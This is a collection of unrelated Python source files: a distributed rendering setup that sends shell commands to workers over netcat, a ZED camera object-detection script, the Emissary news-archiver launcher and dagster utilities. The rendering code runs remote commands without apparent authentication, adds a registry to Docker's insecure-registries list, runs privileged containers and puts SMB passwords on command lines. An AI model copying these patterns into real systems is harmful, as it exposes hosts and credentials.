flags.DEFINE_string("disparity_type", "disparity", "type of disparity to render")
flags.DEFINE_boolean(
"do_temporal_filter", True, "whether to run temporal filtering"
)
flags.DEFINE_boolean(
"do_temporal_masking",
False,
"use foreground masks when doing temporal filtering",
)
flags.DEFINE_boolean(
"force_recompute",
False,
"whether to recompute previously performed pipeline stages",
)
flags.DEFINE_string("master", config.LOCALHOST, "ip address of master")
flags.DEFINE_string(
"password", "", "password for NFS (only relevant for SMB mounts)"
)
flags.DEFINE_boolean("run_convert_to_binary", True, "run binary conversion")
flags.DEFINE_boolean("run_depth_estimation", True, "run depth estimation")
flags.DEFINE_boolean("run_fusion", True, "run fusion")
flags.DEFINE_boolean(
"run_generate_foreground_masks", True, "run foreground mask generation"
)
flags.DEFINE_boolean("run_precompute_resizes", True, "run resizing")
flags.DEFINE_boolean(
"run_precompute_resizes_foreground", True, "run foreground mask resizing"
)
flags.DEFINE_boolean("run_simple_mesh_renderer", True, "run simple mesh renderer")
flags.DEFINE_boolean("skip_setup", False, "assume workers have already been set up")
flags.DEFINE_string(
"username", "", "username for NFS (only relevant for SMB mounts)"
)
flags.DEFINE_string("workers", config.LOCALHOST, "ip addresses of workers")
flag_names.update(
{
"chunk_size",
"cloud",
"color_type",
"disparity_type",
"do_temporal_filter",
"do_temporal_masking",
"force_recompute",
"master",
"password",
"run_generate_foreground_masks",
"run_precompute_resizes",
"run_precompute_resizes_foreground",
"run_depth_estimation",
"run_convert_to_binary",
"run_fusion",
"run_simple_mesh_renderer",
"skip_setup",
"username",
"workers",
}
)
def log_flags():
"""Prints formatted list of flags and their values."""
padding = max(len(flag_name) for flag_name in flag_names)
sorted_flags = sorted(flag_names)
for flag_name in sorted_flags:
logging.info(f"{flag_name} = {FLAGS[flag_name].value}".ljust(padding))
def docker_mounts(input_root, host_to_docker_path, username, password):
"""Constructs a list of the relevant commands to mount the external paths.
The mounts are performed as commands if on a LAN and are volume mounts if
for a single node.
Args:
input_root (str): Path to the root of inputs.
host_to_docker_path (dict[str, str]): Map of local paths to path inside container.
username (str): Username for SMB drive. Can be blank if no username is used
for the drive or if rendering locally.
password (str): Password for SMB drive. Can be blank if no password is used
for the drive or if rendering locally.
Returns:
list[str]: List of Docker mount commands
"""
if Address(input_root).protocol == "smb":
mount_creds = f"mount -t cifs -o username={username},password={password} "
mounts = [
f"{mount_creds} //{Address(external_path).ip_path} {docker_path}"
for external_path, docker_path in host_to_docker_path.items()
]
else:
mounts = [
f"--mount type=bind,source={external_path},target={docker_path} \\"
for external_path, docker_path in host_to_docker_path.items()
]
return mounts
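# Illustrative example (hypothetical paths; assumes Address() reports a non-SMB
# protocol for a plain local path, so the bind-mount branch above is taken):
#
#     docker_mounts("/data/render", {"/data/render": "/input"}, "", "")
#     # -> ['--mount type=bind,source=/data/render,target=/input \\']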
def docker_run_cmd(ip, docker_img=config.DOCKER_IMAGE):
"""Constructs the command to run the Docker container. The container will map all
the desired endpoints to the canonical structure internally.
Args:
ip (str): IP of the master.
docker_img (str, optional): Name of the docker image.
Returns:
str: Command to run the configured Docker container.
"""
master = config.DOCKER_LOCALHOST if ip == config.LOCALHOST else FLAGS.master
host_to_docker_path = {
FLAGS.input_root: config.DOCKER_INPUT_ROOT,
FLAGS.color: os.path.join(config.DOCKER_INPUT_ROOT, image_type_paths["color"]),
FLAGS.background_disp: os.path.join(
config.DOCKER_INPUT_ROOT, image_type_paths["background_disp"]
),
FLAGS.background_color: os.path.join(
config.DOCKER_INPUT_ROOT, image_type_paths["background_color"]
),
FLAGS.foreground_masks: os.path.join(
config.DOCKER_INPUT_ROOT, image_type_paths["foreground_masks"]
),
FLAGS.output_root: config.DOCKER_OUTPUT_ROOT,
}
mounts = docker_mounts(
FLAGS.input_root, host_to_docker_path, FLAGS.username, FLAGS.password
)
if Address(FLAGS.input_root).protocol == "smb":
return f"""docker run --privileged \
-t -d {docker_img}:latest \
/bin/bash -c "mkdir {config.DOCKER_INPUT_ROOT} && mkdir {config.DOCKER_OUTPUT_ROOT} && {" && ".join(
mounts)} && python3 {config.DOCKER_SCRIPTS_ROOT}/render/worker.py --master {master}" """
else:
mount_cmds = "\n".join(mounts)
return f"""docker run {mount_cmds} \
-t -d {docker_img}:latest \
python3 {config.DOCKER_SCRIPTS_ROOT}/render/worker.py --master {master}"""
def configure_worker_daemon(ip):
"""Configures the Docker daemon to accept HTTP connections for using the local registry.
Args:
ip (str): IP of the worker.
"""
os_type = get_os_type(ip)
os_paths = {
OSType.MAC: "~/.docker/",
OSType.WINDOWS: "$env:userprofile\.docker",
OSType.LINUX: "/etc/docker/",
}
os_restarts = {
OSType.MAC: [
"""osascript -e 'quit app "Docker"'""",
"open -a Docker",
"until docker ps; sleep 2; done",
],
OSType.WINDOWS: [
"net stop docker",
"net stop com.docker.service",
'taskkill /IM "dockerd.exe" /F',
'taskkill /IM "Docker for Windows.exe" /F',
"net start docker",
"net start com.docker.service",
'& "c:\\Program Files\\Docker\\Docker\\Docker for Windows.exe"',
"while (!(docker ps)) { sleep 2 };",
],
OSType.LINUX: ["systemctl restart docker"],
}
registry = f"{FLAGS.master}:{config.DOCKER_REGISTRY_PORT}"
daemon_json = os.path.join(os_paths[os_type], config.DOCKER_DAEMON_JSON)
nc = NetcatClient(ip, config.NETCAT_PORT)
results = nc.run([f"cat {daemon_json}"])
try:
relevant_part = r"\{[^\}]*\}" # extracts section inside braces
m = re.search(relevant_part, results)
daemon_config = json.loads(m.group(0))
except Exception:
daemon_config = {}
if "insecure-registries" in daemon_config:
if registry in daemon_config["insecure-registries"]:
return
else:
daemon_config["insecure-registries"] = []
daemon_config["insecure-registries"].append(registry)
new_daemon_config = json.dumps(daemon_config)
configure_cmds = [f"echo '{new_daemon_config}' > {daemon_json}"]
configure_cmds += os_restarts[os_type]
nc.run(configure_cmds)
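# Sketch of the daemon.json this writes to the worker (registry value assumed for
# illustration): {"insecure-registries": ["<master-ip>:<DOCKER_REGISTRY_PORT>"]}.
# This whitelists the master's local registry for plain-HTTP pulls before the
# worker's Docker daemon is restarted with the OS-specific commands above.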
def spawn_worker(ip, num_containers, run_async):
"""Creates worker container(s) on the desired IP.
Args:
ip (str): IP of the machine to run the worker container.
num_containers (int): Number of containers to be run.
run_async (bool): Whether the spawning should happen synchronously or not.
"""
print(f"Spawning worker on: {ip}...")
remote_image = f"{FLAGS.master}:{config.DOCKER_REGISTRY_PORT}/{config.DOCKER_IMAGE}"
configure_worker_daemon(ip)
cmds = ["docker stop $(docker ps -a -q)", f"docker pull {remote_image}"]
cmds += [docker_run_cmd(ip, remote_image)] * num_containers
nc = NetcatClient(ip, config.NETCAT_PORT)
os_type = get_os_type(ip)
if os_type == OSType.LINUX:
nc.run_script("setup_gpu.sh")
if run_async:
nc.run_async(cmds)
else:
nc.run(cmds)
print(f"Completed setup of {ip}!")
def spawn_worker_local(replica):
"""Starts a worker locally.
Args:
replica (int): Replica ID of the worker being spawned.
"""
# We use Popen instead of run_command, since worker process is backgrounded
timestamp = datetime.datetime.now().strftime("%Y%m%d%H%M%S.%f")
worker_logfile = os.path.join(
config.DOCKER_INPUT_ROOT, "logs", f"Worker-{timestamp}-{replica}"
)
os.makedirs(os.path.dirname(worker_logfile), exist_ok=True)
with open(worker_logfile, "w") as fp:
proc = Popen(
[
"python3",
f"{config.DOCKER_SCRIPTS_ROOT}/render/worker.py",
f"--master={FLAGS.master}",
],
stdout=fp,
stderr=fp,
)
global child_pids
child_pids.append(proc.pid)
def setup_master(base_params):
"""Sets up the master node for rendering.
Args:
base_params (dict[str, _]): Map of all the FLAGS defined in render.py.
"""
protocol = Address(base_params["input_root"]).protocol
try:
if protocol == "s3":
run_command("sudo service rabbitmq-server start")
else:
run_command("service rabbitmq-server start")
except Exception:
runtime = "nvidia" if which("nvidia-docker") else ""
cmd = f"""docker run --runtime={runtime} -p 5672:5672 -p 15672:15672 \
-d {config.DOCKER_IMAGE}:latest rabbitmq-server start"""
run_command(cmd)
def setup_workers(base_params):
"""Sets up the worker nodes for rendering.
Args:
base_params (dict[str, _]): Map of all the FLAGS defined in render.py.
"""
processes = []
for worker in FLAGS.workers.split(","):
if ":" in worker:
ip, num_replicas = worker.split(":")
num_replicas = int(num_replicas)
else:
ip = worker
num_replicas = 1
if ip == config.LOCALHOST:
for replica in range(num_replicas):
spawn_worker_local(replica)
else:
processes.append(
mp.Process(target=spawn_worker, args=(ip, num_replicas, False))
)
for process in processes:
process.start()
for process in processes:
process.join()
def cleanup_workers():
"""Destroys the worker process if running locally."""
for child_pid in child_pids:
os.kill(child_pid, signal.SIGTERM)
|
object_detection_zed.py
|
import numpy as np
import os
import six.moves.urllib as urllib
import sys
import tensorflow as tf
import collections
import statistics
import math
import tarfile
import os.path
from threading import Lock, Thread
from time import sleep
import cv2
# ZED imports
import pyzed.sl as sl
sys.path.append('utils')
# ## Object detection imports
from object_detection.utils import ops as utils_ops
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
def load_image_into_numpy_array(image):
ar = image.get_data()
ar = ar[:, :, 0:3]
(im_height, im_width, channels) = image.get_data().shape
return np.array(ar).reshape((im_height, im_width, 3)).astype(np.uint8)
def load_depth_into_numpy_array(depth):
ar = depth.get_data()
ar = ar[:, :, 0:4]
(im_height, im_width, channels) = depth.get_data().shape
return np.array(ar).reshape((im_height, im_width, channels)).astype(np.float32)
lock = Lock()
width = 704
height = 416
confidence = 0.35
image_np_global = np.zeros([width, height, 3], dtype=np.uint8)
depth_np_global = np.zeros([width, height, 4], dtype=np.float32)  # np.float is removed in newer NumPy; the depth buffer is float32
exit_signal = False
new_data = False
# ZED image capture thread function
def capture_thread_func(svo_filepath=None):
global image_np_global, depth_np_global, exit_signal, new_data
zed = sl.Camera()
# Create a InitParameters object and set configuration parameters
input_type = sl.InputType()
if svo_filepath is not None:
input_type.set_from_svo_file(svo_filepath)
init_params = sl.InitParameters(input_t=input_type)
init_params.camera_resolution = sl.RESOLUTION.HD720
init_params.camera_fps = 30
init_params.depth_mode = sl.DEPTH_MODE.PERFORMANCE
init_params.coordinate_units = sl.UNIT.METER
init_params.svo_real_time_mode = False
# Open the camera
err = zed.open(init_params)
print(err)
while err != sl.ERROR_CODE.SUCCESS:
err = zed.open(init_params)
print(err)
sleep(1)
image_mat = sl.Mat()
depth_mat = sl.Mat()
runtime_parameters = sl.RuntimeParameters()
image_size = sl.Resolution(width, height)
while not exit_signal:
if zed.grab(runtime_parameters) == sl.ERROR_CODE.SUCCESS:
zed.retrieve_image(image_mat, sl.VIEW.LEFT, resolution=image_size)
zed.retrieve_measure(depth_mat, sl.MEASURE.XYZRGBA, resolution=image_size)
lock.acquire()
image_np_global = load_image_into_numpy_array(image_mat)
depth_np_global = load_depth_into_numpy_array(depth_mat)
new_data = True
lock.release()
sleep(0.01)
zed.close()
def display_objects_distances(image_np, depth_np, num_detections, boxes_, classes_, scores_, category_index):
box_to_display_str_map = collections.defaultdict(list)
box_to_color_map = collections.defaultdict(str)
research_distance_box = 30
for i in range(num_detections):
if scores_[i] > confidence:
box = tuple(boxes_[i].tolist())
if classes_[i] in category_index.keys():
class_name = category_index[classes_[i]]['name']
display_str = str(class_name)
if not display_str:
display_str = '{}%'.format(int(100 * scores_[i]))
else:
display_str = '{}: {}%'.format(display_str, int(100 * scores_[i]))
# Find object distance
ymin, xmin, ymax, xmax = box
x_center = int(xmin * width + (xmax - xmin) * width * 0.5)
y_center = int(ymin * height + (ymax - ymin) * height * 0.5)
x_vect = []
y_vect = []
z_vect = []
min_y_r = max(int(ymin * height), int(y_center - research_distance_box))
min_x_r = max(int(xmin * width), int(x_center - research_distance_box))
max_y_r = min(int(ymax * height), int(y_center + research_distance_box))
max_x_r = min(int(xmax * width), int(x_center + research_distance_box))
if min_y_r < 0: min_y_r = 0
if min_x_r < 0: min_x_r = 0
if max_y_r > height: max_y_r = height
if max_x_r > width: max_x_r = width
for j_ in range(min_y_r, max_y_r):
for i_ in range(min_x_r, max_x_r):
z = depth_np[j_, i_, 2]
if not np.isnan(z) and not np.isinf(z):
x_vect.append(depth_np[j_, i_, 0])
y_vect.append(depth_np[j_, i_, 1])
z_vect.append(z)
if len(x_vect) > 0:
x = statistics.median(x_vect)
y = statistics.median(y_vect)
z = statistics.median(z_vect)
distance = math.sqrt(x * x + y * y + z * z)
display_str = display_str + " " + str('% 6.2f' % distance) + " m "
box_to_display_str_map[box].append(display_str)
box_to_color_map[box] = vis_util.STANDARD_COLORS[classes_[i] % len(vis_util.STANDARD_COLORS)]
for box, color in box_to_color_map.items():
ymin, xmin, ymax, xmax = box
vis_util.draw_bounding_box_on_image_array(
image_np,
ymin,
xmin,
ymax,
xmax,
color=color,
thickness=4,
display_str_list=box_to_display_str_map[box],
use_normalized_coordinates=True)
return image_np
def main(args):
svo_filepath = None
if len(args) > 1:
svo_filepath = args[1]
# This main thread will run the object detection, the capture thread is loaded later
# What model to download and load
#MODEL_NAME = 'ssd_mobilenet_v1_coco_2018_01_28'
MODEL_NAME = 'ssd_mobilenet_v1_fpn_shared_box_predictor_640x640_coco14_sync_2018_07_03'
#MODEL_NAME = 'ssd_resnet50_v1_fpn_shared_box_predictor_640x640_coco14_sync_2018_07_03'
#MODEL_NAME = 'ssd_mobilenet_v1_coco_2018_01_28'
#MODEL_NAME = 'faster_rcnn_nas_coco_2018_01_28' # Accurate but heavy
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_FROZEN_GRAPH = 'data/' + MODEL_NAME + '/frozen_inference_graph.pb'
# Check if the model is already present
if not os.path.isfile(PATH_TO_FROZEN_GRAPH):
print("Downloading model " + MODEL_NAME + "...")
MODEL_FILE = MODEL_NAME + '.tar.gz'
MODEL_PATH = 'data/' + MODEL_NAME + '.tar.gz'
DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/'
opener = urllib.request.URLopener()
opener.retrieve(DOWNLOAD_BASE + MODEL_FILE, MODEL_PATH)
tar_file = tarfile.open(MODEL_PATH)
for file in tar_file.getmembers():
file_name = os.path.basename(file.name)
if 'frozen_inference_graph.pb' in file_name:
tar_file.extract(file, 'data/')
    # List of the strings that are used to add the correct label to each box.
PATH_TO_LABELS = os.path.join('data', 'mscoco_label_map.pbtxt')
NUM_CLASSES = 90
# Start the capture thread with the ZED input
print("Starting the ZED")
capture_thread = Thread(target=capture_thread_func, kwargs={'svo_filepath': svo_filepath})
capture_thread.start()
# Shared resources
global image_np_global, depth_np_global, new_data, exit_signal
# Load a (frozen) Tensorflow model into memory.
print("Loading model " + MODEL_NAME)
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_FROZEN_GRAPH, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
# Limit to a maximum of 50% the GPU memory usage taken by TF https://www.tensorflow.org/guide/using_gpu
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.5
# Loading label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES,
use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Detection
with detection_graph.as_default():
with tf.Session(config=config, graph=detection_graph) as sess:
while not exit_signal:
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
if new_data:
lock.acquire()
image_np = np.copy(image_np_global)
depth_np = np.copy(depth_np_global)
new_data = False
lock.release()
image_np_expanded = np.expand_dims(image_np, axis=0)
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
                    # Each score represents the level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
scores = detection_graph.get_tensor_by_name('detection_scores:0')
classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# Actual detection.
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
num_detections_ = num_detections.astype(int)[0]
# Visualization of the results of a detection.
image_np = display_objects_distances(
image_np,
depth_np,
num_detections_,
np.squeeze(boxes),
np.squeeze(classes).astype(np.int32),
np.squeeze(scores),
category_index)
cv2.imshow('ZED object detection', cv2.resize(image_np, (width, height)))
if cv2.waitKey(10) & 0xFF == ord('q'):
cv2.destroyAllWindows()
exit_signal = True
else:
sleep(0.01)
sess.close()
exit_signal = True
capture_thread.join()
if __name__ == '__main__':
main(sys.argv)
|
run.py
|
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# The reason we don't patch threading is because
# our IPC queues rely on it for locking. We can't have them
# be greenlets, otherwise they will need the HTTPD to yield
# before data from the fetch process can be transmitted.
from gevent import monkey; monkey.patch_all(thread=False)
import gevent
from gevent.queue import Queue
from gevent.socket import socket
from gevent.wsgi import WSGIServer
import os
import sys
import pwd
import time
import signal
import _socket
import optparse
from multiprocessing import Process
from emissary import app, init, db
from emissary.models import APIKey
from emissary.controllers.log import Log
from emissary.controllers.scripts import Scripts
from emissary.controllers.load import parse_crontab
from emissary.controllers.manager import FeedManager
try:
import setproctitle
setproctitle.setproctitle("emissary")
except ImportError:
pass
def Daemonise(pidfile):
try:
pid = os.fork()
if pid > 0:
sys.exit(0) # End parent
except OSError, e:
sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(-2)
os.setsid()
os.umask(0)
try:
pid = os.fork()
if pid > 0:
try:
# TODO: Read the file first and determine if already running.
f = file(pidfile, 'w')
f.write(str(pid))
f.close()
            except IOError, e:
                # 'logging' is not imported in this module; report to stderr instead.
                sys.stderr.write(repr(e))
sys.exit(0) # End parent
except OSError, e:
sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(-2)
for fd in (0, 1, 2):
try:
os.close(fd)
except OSError:
pass
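# Note: Daemonise() uses the classic double-fork-and-setsid sequence: the daemon is
# re-parented away from the invoking shell, detached from the controlling terminal,
# its PID is recorded in `pidfile`, and the standard descriptors 0-2 are closed.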
def export_crontab(filename):
"""
Defined here to prevent circular imports.
"""
crontab = ""
fd = open(filename, "w")
keys = [k for k in APIKey.query.all() if not k.reader]
for key in keys:
crontab += "apikey: %s\n\n" % key.key
for feed in key.feeds:
crontab += '%s "%s" "%s" %s\n' % (feed.url, feed.name, feed.group.name, feed.schedule)
crontab += '\n\n'
fd.write(crontab)
fd.close()
if __name__ == "__main__":
prog = "Emissary"
description = "A microservice for archiving the news."
epilog = "Psybernetics %s." % time.asctime().split()[-1]
parser = optparse.OptionParser(prog=prog,version=app.version,description=description,epilog=epilog)
parser.set_usage('python -m emissary.run [options]')
parser.add_option("-c", "--crontab", dest="crontab", action="store", default=None, help="Crontab to parse")
parser.add_option("--config", dest="config", action="store", default=None, help="(defaults to emissary.config)")
parser.add_option("-a", "--address", dest="address", action="store", default='0.0.0.0', help="(defaults to 0.0.0.0)")
parser.add_option("-p", "--port", dest="port", action="store", default='6362', help="(defaults to 6362)")
parser.add_option("--key", dest="key", action="store", default=None, help="SSL key file")
parser.add_option("--cert", dest="cert", action="store", default=None, help="SSL certificate")
parser.add_option("--export", dest="export", action="store", default=False, help="Write out current database as a crontab")
parser.add_option("--pidfile", dest="pidfile", action="store", default="emissary.pid", help="(defaults to ./emissary.pid)")
parser.add_option("--logfile", dest="logfile", action="store", default="emissary.log", help="(defaults to ./emissary.log)")
parser.add_option("--stop", dest="stop", action="store_true", default=False)
parser.add_option("--debug", dest="debug", action="store_true", default=False, help="Log to stdout")
parser.add_option("-d", dest="daemonise", action="store_true", default=False, help="Run in the background")
parser.add_option("--run-as", dest="run_as", action="store",default=None, help="(defaults to the invoking user)")
parser.add_option("--scripts-dir", dest="scripts_dir", action="store", default="scripts", help="(defaults to ./scripts/)")
(options,args) = parser.parse_args()
if options.config:
app.config.from_object(options.config)
if options.crontab:
parse_crontab(options.crontab)
raise SystemExit
app.debug = options.debug
# Build logger from config
log = Log("Emissary", log_file=options.logfile, log_stdout= not options.daemonise)
log.debug = options.debug
app.log = log
log("Starting Emissary %s." % app.version)
if options.stop:
        pid = None
        pids = []
try:
f = file(options.pidfile, 'r')
pids = f.readline().split()
f.close()
os.unlink(options.pidfile)
except ValueError, e:
sys.stderr.write('Error in pid file "%s". Aborting\n' % options.pidfile)
sys.exit(-1)
except IOError, e:
pass
if pids:
for pid in pids:
os.kill(int(pid), 15)
print "Killed process with ID %s." % pid
else:
sys.stderr.write('Emissary not running or no PID file found\n')
sys.exit(0)
if options.export:
try:
            export_crontab(options.export)
            log('Crontab written to "%s".' % options.export)
except Exception, e:
log('Error writing crontab: %s' % e.message)
raise SystemExit
if not options.key and not options.cert:
print "SSL cert and key required. (--key and --cert)"
print "Keys and certs can be generated with:"
print "$ openssl genrsa 1024 > key"
print "$ openssl req -new -x509 -nodes -sha1 -days 365 -key key > cert"
raise SystemExit
if '~' in options.cert: options.cert = os.path.expanduser(options.cert)
if '~' in options.key: options.key = os.path.expanduser(options.key)
if not os.path.isfile(options.cert):
sys.exit("Certificate not found at %s" % options.cert)
if not os.path.isfile(options.key):
sys.exit("Key not found at %s" % options.key)
if (pwd.getpwuid(os.getuid())[2] == 0) and not options.run_as:
print "Running as root is not permitted.\nExecute this as a different user."
raise SystemExit
sock = (options.address, int(options.port))
if options.run_as:
sock = socket(family=_socket.AF_INET)
try:
sock.bind((options.address, int(options.port)))
except _socket.error:
ex = sys.exc_info()[1]
strerror = getattr(ex, 'strerror', None)
if strerror is not None:
ex.strerror = strerror + ': ' + repr(options.address+':'+options.port)
raise
sock.listen(50)
sock.setblocking(0)
uid = pwd.getpwnam(options.run_as)[2]
try:
os.setuid(uid)
log("Now running as %s." % options.run_as)
except Exception, e: raise
# Create the database schema and insert an administrative key
init()
if options.daemonise: Daemonise(options.pidfile)
# Load scripts
app.scripts = Scripts(options.scripts_dir)
app.scripts.reload()
# Trap SIGHUP to reload scripts
signal.signal(signal.SIGHUP, app.scripts.reload)
# Initialise the feed manager with the logger, provide IPC access and load feeds.
fm = FeedManager(log)
fm.db = db
fm.app = app # Queue access
fm.load_feeds()
# Start the REST interface
httpd = WSGIServer(sock, app, certfile=options.cert, keyfile=options.key)
httpd.loop.reinit()
httpd_process = Process(target=httpd.serve_forever)
log("Binding to %s:%s" % (options.address, options.port))
httpd_process.start()
if options.daemonise:
f = file(options.pidfile, 'a')
f.write(' %i' % httpd_process.pid)
f.close()
try:
fm.run()
except KeyboardInterrupt:
log("Stopping...")
httpd_process.terminate()
|
__init__.py
|
import contextlib
import datetime
import errno
import inspect
import multiprocessing
import os
import re
import signal
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import yaml
from six.moves import configparser
from dagster import check
from dagster.core.errors import DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, thread
from dagster.seven.abc import Mapping
from dagster.utils.merger import merge_dicts
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
PICKLE_PROTOCOL = 2
DEFAULT_REPOSITORY_YAML_FILENAME = 'repository.yaml'
def file_relative_path(dunderfile, relative_path):
'''
This function is useful when one needs to load a file that is
    relative to the position of the current file. (Such as when
    you encode a configuration file path in a source file and want
    it to be runnable from any current working directory)
It is meant to be used like the following:
file_relative_path(__file__, 'path/relative/to/file')
'''
check.str_param(dunderfile, 'dunderfile')
check.str_param(relative_path, 'relative_path')
return os.path.join(os.path.dirname(dunderfile), relative_path)
def script_relative_path(file_path):
'''
Useful for testing with local files. Use a path relative to where the
test resides and this function will return the absolute path
    of that file. Otherwise it will be relative to the script that
    ran the test.
    Note: this function is very, very expensive (on the order of 1
millisecond per invocation) so this should only be used in performance
insensitive contexts. Prefer file_relative_path for anything with
performance constraints.
'''
# from http://bit.ly/2snyC6s
check.str_param(file_path, 'file_path')
scriptdir = inspect.stack()[1][1]
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, 'string')
string = re.sub(r'^[\-_\.]', '', str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r'[\-_\.\s]([a-z])', lambda matched: str(matched.group(1)).upper(), string[1:]
)
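# Illustrative behavior of camelcase(), derived from the regexes above:
#
#     camelcase('hello_world')   # -> 'HelloWorld'
#     camelcase('foo-bar.baz')   # -> 'FooBarBaz'
#     camelcase('_already')      # -> 'Already'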
def ensure_single_item(ddict):
check.dict_param(ddict, 'ddict')
check.param_invariant(len(ddict) == 1, 'ddict', 'Expected dict with single item')
return list(ddict.items())[0]
@contextlib.contextmanager
def pushd(path):
old_cwd = os.getcwd()
os.chdir(path)
try:
yield path
finally:
os.chdir(old_cwd)
def safe_isfile(path):
'''"Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
'''
try:
return os.path.isfile(path)
except ValueError:
return False
def mkdir_p(path):
try:
os.makedirs(path)
return path
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
class frozendict(dict):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyDict")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
# in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
# override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
# passed to __setstate__, allowing us to restore the frozendict.
def __reduce__(self):
return (frozendict, (), dict(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
popitem = __readonly__
clear = __readonly__
update = __readonly__
setdefault = __readonly__
del __readonly__
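# Illustrative usage sketch (commented out):
#
#     d = frozendict({'a': 1})
#     d['b'] = 2                      # raises RuntimeError("Cannot modify ReadOnlyDict")
#     import pickle
#     pickle.loads(pickle.dumps(d))   # round-trips via __reduce__/__setstate__ -> frozendict({'a': 1})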
class frozenlist(list):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyList")
__setitem__ = __readonly__
__delitem__ = __readonly__
append = __readonly__
clear = __readonly__
extend = __readonly__
insert = __readonly__
pop = __readonly__
remove = __readonly__
reverse = __readonly__
sort = __readonly__
def make_readonly_value(value):
if isinstance(value, list):
return frozenlist(list(map(make_readonly_value, value)))
elif isinstance(value, dict):
return frozendict({key: make_readonly_value(value) for key, value in value.items()})
else:
return value
def get_prop_or_key(elem, key):
if isinstance(elem, Mapping):
return elem.get(key)
else:
return getattr(elem, key)
def list_pull(alist, key):
return list(map(lambda elem: get_prop_or_key(elem, key), alist))
def get_multiprocessing_context():
# Set execution method to spawn, to avoid fork and to have same behavior between platforms.
# Older versions are stuck with whatever is the default on their platform (fork on
# Unix-like and spawn on windows)
#
# https://docs.python.org/3/library/multiprocessing.html#multiprocessing.get_context
if hasattr(multiprocessing, 'get_context'):
return multiprocessing.get_context('spawn')
else:
return multiprocessing
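# Illustrative usage sketch (commented out; `work` is a hypothetical target function):
#
#     ctx = get_multiprocessing_context()
#     p = ctx.Process(target=work, args=(1,))   # uses 'spawn' where available
#     p.start()
#     p.join()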
def all_none(kwargs):
for value in kwargs.values():
if value is not None:
return False
return True
def check_script(path, return_code=0):
try:
subprocess.check_output(['python', path])
except subprocess.CalledProcessError as exc:
if return_code != 0:
if exc.returncode == return_code:
return
raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
cli_cmd = ['python', '-m', 'dagster', 'pipeline', 'execute', '-f', path, '-n', pipeline_fn_name]
if env_file:
cli_cmd.append('-e')
cli_cmd.append(env_file)
try:
subprocess.check_output(cli_cmd)
except subprocess.CalledProcessError as cpe:
print(cpe)
raise cpe
@contextlib.contextmanager
def safe_tempfile_path():
# This gets a valid temporary file path in the safest possible way, although there is still no
# guarantee that another process will not create a file at this path. The NamedTemporaryFile is
# deleted when the context manager exits and the file object is closed.
#
# This is preferable to using NamedTemporaryFile as a context manager and passing the name
# attribute of the file object around because NamedTemporaryFiles cannot be opened a second time
# if already open on Windows NT or later:
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
# https://github.com/dagster-io/dagster/issues/1582
with tempfile.NamedTemporaryFile() as fd:
path = fd.name
try:
yield Path(path).as_posix()
finally:
if os.path.exists(path):
os.unlink(path)
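# Illustrative usage sketch (commented out):
#
#     with safe_tempfile_path() as path:
#         with open(path, 'w') as f:    # safe to reopen, even on Windows
#             f.write('scratch data')
#     # the file, if it was created, has been removed once the context exits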
def ensure_gen(thing_or_gen):
if not inspect.isgenerator(thing_or_gen):
def _gen_thing():
yield thing_or_gen
return _gen_thing()
return thing_or_gen
def ensure_dir(file_path):
try:
os.makedirs(file_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def ensure_file(path):
ensure_dir(os.path.dirname(path))
if not os.path.exists(path):
touch_file(path)
def touch_file(path):
ensure_dir(os.path.dirname(path))
with open(path, 'a'):
os.utime(path, None)
def _kill_on_event(termination_event):
termination_event.wait()
if IS_WINDOWS:
        # This will raise a KeyboardInterrupt in python land - meaning this won't be able to
# interrupt things like sleep()
